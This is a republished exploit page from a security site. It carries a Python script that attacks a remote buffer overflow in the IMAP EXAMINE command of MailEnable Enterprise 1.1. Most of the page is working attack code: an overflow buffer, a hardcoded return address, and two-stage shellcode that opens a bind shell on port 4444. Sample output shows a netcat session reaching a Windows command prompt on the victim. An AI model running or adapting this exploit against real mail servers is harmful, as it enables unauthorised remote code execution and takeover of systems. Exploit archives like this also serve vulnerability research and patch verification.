首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mailenable Enterprise EXAMINE Command Remote Buffer Overflow Exploit
来源:mati@see-security.com 作者:mati 发布时间:2005-12-20  

Mailenable Enterprise "EXAMINE" Command Remote Buffer Overflow Exploit


#!/usr/bin/python
#######################################################
#
# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow
# Discovered and exploited by mati@see-security.com
# This vulnerability affects Mailenable Enterprise 1.1
# *without* the ME-10009.EXE patch.
#
# Details:
# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command.
# * Filtering of 0x00 0x0a 0x0d 0x20 0x22
# * No space for shellcode, so 1st stage shellcode is used to
# jump back 512 bytes into the bindshell (2nd stage) shellcode.
#
# Thanks:
# * My wife - for putting up with my obesssions
# * Talz - for helping me out with the 1st stage shellcode
#
# FOR EDUCATION PURPOSES ONLY!
#######################################################
# 1st stage shellcode:
#######################################################
# [BITS 32]
#
# global _start
#
# _start:
#
# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams
#
# ;--- copy eip into ecx
# fldz
# fnstenv [esp-12]
# pop ecx
# add cl, 10
# nop
# ;----------------------------------------------------------------------
# dec ch ; ecx=-256;
# dec ch ; ecx=-256;
# jmp ecx ; lets jmp ecx (current location - 512)
######################################################
# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp
#
# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch.
# Discovered / Coded by mati@see-security.com
#
# [+] Connecting to 192.168.1.160
# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06
# [+] Logging in as ftp
# [+] a001 OK LOGIN completed
# [+] Sending evil buffer...
# [+] Done
#
# [+] Try connecting to port 4444 on victim IP - Muhahaha!
#
# root@slax:/tmp# nc -nv 192.168.1.160 4444
# (UNKNOWN) [192.168.1.160] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#####################################################

import sys
import struct
import socket
from time import sleep

if len(sys.argv)!=5:
print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch."
print "\nDiscovered / Coded by mati@see-security.com\n"
print "Usage: %s <ip> <port> <user> <pass>\n" %sys.argv[0]
sys.exit(0)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Return Address - Win2k SP4 jmp ebx
returnaddress = "\x66\x4a\x4e\x7c"

# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode

sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"

# win32_bind - EXITFUNC=thread LPORT=4444 Size=344
# Encoder=PexFnstenvSub http://metasploit.com
# Second Stage Shellcode

sc2 = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfa"
sc2 +="\xa8\xc8\x2a\x83\xeb\xfc\xe2\xf4\x06\xc2\x23\x67\x12\x51\x37\xd5"
sc2 +="\x05\xc8\x43\x46\xde\x8c\x43\x6f\xc6\x23\xb4\x2f\x82\xa9\x27\xa1"
sc2 +="\xb5\xb0\x43\x75\xda\xa9\x23\x63\x71\x9c\x43\x2b\x14\x99\x08\xb3"
sc2 +="\x56\x2c\x08\x5e\xfd\x69\x02\x27\xfb\x6a\x23\xde\xc1\xfc\xec\x02"
sc2 +="\x8f\x4d\x43\x75\xde\xa9\x23\x4c\x71\xa4\x83\xa1\xa5\xb4\xc9\xc1"
sc2 +="\xf9\x84\x43\xa3\x96\x8c\xd4\x4b\x39\x99\x13\x4e\x71\xeb\xf8\xa1"
sc2 +="\xba\xa4\x43\x5a\xe6\x05\x43\x6a\xf2\xf6\xa0\xa4\xb4\xa6\x24\x7a"
sc2 +="\x05\x7e\xae\x79\x9c\xc0\xfb\x18\x92\xdf\xbb\x18\xa5\xfc\x37\xfa"
sc2 +="\x92\x63\x25\xd6\xc1\xf8\x37\xfc\xa5\x21\x2d\x4c\x7b\x45\xc0\x28"
sc2 +="\xaf\xc2\xca\xd5\x2a\xc0\x11\x23\x0f\x05\x9f\xd5\x2c\xfb\x9b\x79"
sc2 +="\xa9\xfb\x8b\x79\xb9\xfb\x37\xfa\x9c\xc0\xd9\x76\x9c\xfb\x41\xcb"
sc2 +="\x6f\xc0\x6c\x30\x8a\x6f\x9f\xd5\x2c\xc2\xd8\x7b\xaf\x57\x18\x42"
sc2 +="\x5e\x05\xe6\xc3\xad\x57\x1e\x79\xaf\x57\x18\x42\x1f\xe1\x4e\x63"
sc2 +="\xad\x57\x1e\x7a\xae\xfc\x9d\xd5\x2a\x3b\xa0\xcd\x83\x6e\xb1\x7d"
sc2 +="\x05\x7e\x9d\xd5\x2a\xce\xa2\x4e\x9c\xc0\xab\x47\x73\x4d\xa2\x7a"
sc2 +="\xa3\x81\x04\xa3\x1d\xc2\x8c\xa3\x18\x99\x08\xd9\x50\x56\x8a\x07"
sc2 +="\x04\xea\xe4\xb9\x77\xd2\xf0\x81\x51\x03\xa0\x58\x04\x1b\xde\xd5"
sc2 +="\x8f\xec\x37\xfc\xa1\xff\x9a\x7b\xab\xf9\xa2\x2b\xab\xf9\x9d\x7b"
sc2 +="\x05\x78\xa0\x87\x23\xad\x06\x79\x05\x7e\xa2\xd5\x05\x9f\x37\xfa"
sc2 +="\x71\xff\x34\xa9\x3e\xcc\x37\xfc\xa8\x57\x18\x42\x15\x66\x28\x4a"
sc2 +="\xa9\x57\x1e\xd5\x2a\xa8\xc8\x2a"

buffer = '\x90'*568 + sc2 + '\x90'*53 + returnaddress + '\xEB\x04' + '\x90'*4 + sc

print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch."
print "Discovered / Coded by mati@see-security.com\n"
print "[+] Connecting to " + sys.argv[1]
try:
s.connect((sys.argv[1],int(sys.argv[2])))
except:
print "Could not connect to IMAP server!"
sys.exit(0)

data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Logging in as %s" % sys.argv[3]
s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'\r\n')
data = s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Sending evil buffer..."
s.send('A001 EXAMINE ' + buffer+'\r\n')
s.close()
print "[+] Done\n"
print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n"



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Flatnuke Authentication Bypass
·Microsoft IIS Malformed HTTP R
·Mercury Mail Transport System
·Eudora Qualcomm WorldMail LIST
·Oracle XDB HTTP PASS Overflow
·Macromedia Flash Media Server
·Watchfire AppScan QA HTTP Resp
·Mailenable Enterprise Examine
·Gecko InstallVersion.compareTo
·GoldenFTPd APPE Stack Overflow
·SimpleBBS Command Execution
·samba-2.2.8 < remote root e
  推荐广告
CopyRight © 2002-2021 VFocuS.Net All Rights Reserved